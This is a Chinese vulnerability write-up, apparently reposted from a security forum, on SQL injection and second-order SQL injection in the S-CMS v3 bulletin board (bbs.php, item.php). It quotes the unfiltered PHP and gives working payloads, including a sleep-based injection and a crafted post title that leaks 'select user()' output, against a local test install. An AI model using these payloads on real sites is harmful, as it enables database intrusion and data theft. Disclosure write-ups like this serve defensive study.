系统城装机大师 - 固镇县祥瑞电脑科技销售部宣传站!

当前位置:首页 > 网页制作 > 整站程序 > 详细页面

S-CMS企建v3二次SQL注入的方法

时间:2019-12-15来源:系统城作者:电脑系统城

0x01 前言

继上一篇的S-CMS漏洞再来一波!首发T00ls

0x2 目录

Sql注入二次SQL注入

0x03 Sql注入

漏洞文件:\scms\bbs\bbs.php


 
  1. $action=$_GET["action"];
  2. $S_id=$_GET["S_id"];
  3. if($action=="add"){
  4. $B_title=htmlspecialchars($_POST["B_title"]);
  5. $B_sort=$_POST["B_sort"];
  6. $B_content=htmlspecialchars($_POST["B_content"]);
  7. $S_sh=getrs("select * from SL_bsort where S_id=".intval($B_sort),"S_sh");
  8. if($S_sh==1){
  9. $B_sh=0;
  10. }else{
  11. $B_sh=1;
  12. }
  13. $debug("insert into SL_bbs(B_title,B_content,B_time,B_mid,B_sort,B_sh) values('".$B_title."','".$B_content."','".date('Y-m-d H:i:s')."',".$_SESSION["M_id"].",".$B_sort.",".$B_sh.")");
  14. mysqli_query($conn,"insert into SL_bbs(B_title,B_content,B_time,B_mid,B_sort,B_sh) values('".$B_title."','".$B_content."','".date('Y-m-d H:i:s')."',".$_SESSION["M_id"].",".$B_sort.",".$B_sh.")");
  15. $sql="Select * from SL_bbs order by B_id desc limit 1";
  16. $result = mysqli_query($conn, $sql);
  17. $row = mysqli_fetch_assoc($result);
  18. if (mysqli_num_rows($result) > 0) {
  19. $B_id=$row["B_id"];
  20. }

相对来说这个注入比较简单,$B_sort 无过滤直接从POST获取,然而在SELECT查询的时候使用了intval函数来过滤变量。不过后面在insert的时候却没有任何过滤(无单引号包含)导致sql注入。

漏洞验证:

—Payload:

——http://127.0.0.1/scms/bbs/bbs.php?action=add

——B_title=test&B_content=test11&B_sort=1 and sleep(5)

$debug调试信息:

Insert into SL_bbs(B_title,B_content,B_time,B_mid,B_sort,B_sh) values('test','test11','2018-12-08 14:21:25',17,1 and sleep(5),0)

0x04 二次注入

漏洞文件:

\scms\bbs\bbs.php

\scms\bbs\item.php

先看一下漏洞触发点:


 
  1. $sql="Select * from SL_bbs,SL_bsort,SL_member,SL_lv where B_sort=S_id and B_mid=M_id and M_lv=L_id and B_id=".$id;
  2. $result = mysqli_query($conn, $sql);
  3. $row = mysqli_fetch_assoc($result);
  4. if (mysqli_num_rows($result) > 0) {
  5. $B_title=lang($row["B_title"]);
  6. $B_content=lang($row["B_content"]);
  7. $B_time=$row["B_time"];
  8. $B_sort=$row["B_sort"];
  9. $S_title=lang($row["S_title"]);
  10. $B_view=$row["B_view"];
  11. $M_login=$row["M_login"];
  12. $M_pic=$row["M_pic"];
  13. $L_title=$row["L_title"];
  14. }
  15. if(substr($M_pic,0,4)!="http"){
  16. $M_pic="../media/".$M_pic;
  17. }
  18. $sql2="Select count(*) as B_count from SL_bbs where B_sub=".$id;
  19.  
  20. $result2 = mysqli_query($conn, $sql2);
  21. $row2 = mysqli_fetch_assoc($result2);
  22. $B_count=$row2["B_count"];
  23. if($action=="reply"){
  24. $B_contentx=$_POST["B_content"];
  25. $debug("insert into SL_bbs(B_title,B_content,B_time,B_mid,B_sub,B_sort) values('[回复]".$B_title."','".$B_contentx."','".date('Y-m-d H:i:s')."',".$_SESSION["M_id"].",".$id.",".$B_sort.")");
  26. mysqli_query($conn,"insert into SL_bbs(B_title,B_content,B_time,B_mid,B_sub,B_sort) values('[回复]".$B_title."','".$B_contentx."','".date('Y-m-d H:i:s')."',".$_SESSION["M_id"].",".$id.",".$B_sort.")");
  27. box("回复成功!","item.php?id=".$id,"success");
  28. }

简单说一下逻辑,第一步执行的sql语句是查询帖子的详细内容($id帖子id)


 
  1. $sql="Select * from SL_bbs,SL_bsort,SL_member,SL_lv where B_sort=S_id and B_mid=M_id and M_lv=L_id and B_id=".$id;

然后把查询到的内容各自赋给一个变量


 
  1. $B_title=lang($row["B_title"]);
  2. $B_content=lang($row["B_content"]);
  3. $B_time=$row["B_time"];
  4. $B_sort=$row["B_sort"];
  5. ..............................

到后面判断$action=="reply",进入回复帖子功能处


 
  1. if($action=="reply"){
  2. $B_contentx=$_POST["B_content"];
  3. $debug("insert into SL_bbs(B_title,B_content,B_time,B_mid,B_sub,B_sort) values('[回复]".$B_title."','".$B_contentx."','".date('Y-m-d H:i:s')."',".$_SESSION["M_id"].",".$id.",".$B_sort.")");
  4. mysqli_query($conn,"insert into SL_bbs(B_title,B_content,B_time,B_mid,B_sub,B_sort) values('[回复]".$B_title."','".$B_contentx."','".date('Y-m-d H:i:s')."',".$_SESSION["M_id"].",".$id.",".$B_sort.")");
  5. box("回复成功!","item.php?id=".$id,"success");
  6. }

可以看到$B_contentx=$_POST["B_content"]无过滤,这里会触发储存xss漏洞。然而这个不是重点,继续看执行的insert语句,发现$B_title等变量都拼接了进来,没有sql过滤,而这些变量是从数据库查询出来的(帖子的标题等),然而回过头去看上面的sql注入,不就是发帖功能的地方么。所以这些变量可控,导致二次sql注入。

漏洞触发流程:

—首先我们去发帖B_title的值是我们的payload,还有其他的值

——B_title=',(select user()),'',1,999,1)%23&B_content=aaaaaaaaaaaa&B_sort=1

—然后我们去获取帖子id,这个没有特别好的办法只能去摸索着找,可以先根据楼层判断一共有多少帖子,然后一点一点的往后找,根据内容判断是否是我们发布的帖子

——http://127.0.0.1//scms/bbs/item.php?id=帖子id

—获取到帖子后去触发漏洞

——http://127.0.0.1//scms/bbs/item.php?action=reply&id=帖子id

——B_content=test

—这里我说一下payload为什么是这样的,这样构造完全是为了达到回显注入,因为后面打印回复内容的时候执行的sql注入是

——$sql="select * from SL_bbs where B_sub=".$id." order by B_id asc";

—而B_sub可控(在Insert的时候插入的),这样我们就能直接获取回显。

漏洞演示:

—Payload1

——127.0.0.1/scms/bbs/bbs.php?action=add

——B_title=',(select user()),'',1,666,1)%23&B_content=hello_admin&B_sort=1

—Payload2

——获取帖子id

——http://127.0.0.1//scms/bbs/item.php?id=30

—Payload3

——http://127.0.0.1//scms/bbs/item.php?action=reply&id=30

——B_content=test

执行完成!最后我们就可以去访问我们的回复然后拿到回显。http://127.0.0.1//scms/bbs/item.php?id=666这次id参数指向的是我们填的B_sub值

0x05 结束语

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持我们。

分享到:

相关信息

系统教程栏目

栏目热门教程

人气教程排行

站长推荐

热门系统下载